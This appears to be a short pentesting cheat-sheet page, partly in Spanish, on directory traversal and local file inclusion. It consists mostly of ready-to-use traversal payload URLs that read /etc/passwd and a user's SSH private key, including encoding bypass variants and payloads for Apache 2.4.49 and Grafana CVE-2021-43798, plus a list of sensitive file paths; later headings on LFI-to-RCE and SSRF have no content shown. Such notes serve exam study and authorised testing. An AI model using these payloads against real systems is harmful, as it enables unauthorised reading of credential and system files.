Web Attacks
Directory traversal / Path Traversal
Linux
http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../etc/passwd
http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa
// Apache 2.4.49
http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
// Grafana 8.0.1 - https://github.com/jas502n/Grafana-CVE-2021-43798
192.168.207.16:3000/public/plugins/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/opt/install.txt
// maquina boolean proving grounds
cwd=../../../../../../etc&file=passwd
// otras rutas interesantes
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/.htpasswd
/var/log/auth.logWindows
Top 25 vulnerable params
Burp Suite Filter History:
Local File Inclusion (LFI)
LFI TO RCE via Log Poisoning
LFI en Windows:
LFI To RCE - Abusing /proc/self/fd/X + Log Poisoning
Finding private keys
SSRF + LFI - WkhtmltoPdf
WkhtmltoPdf - Pentest - Caso Real





Última actualización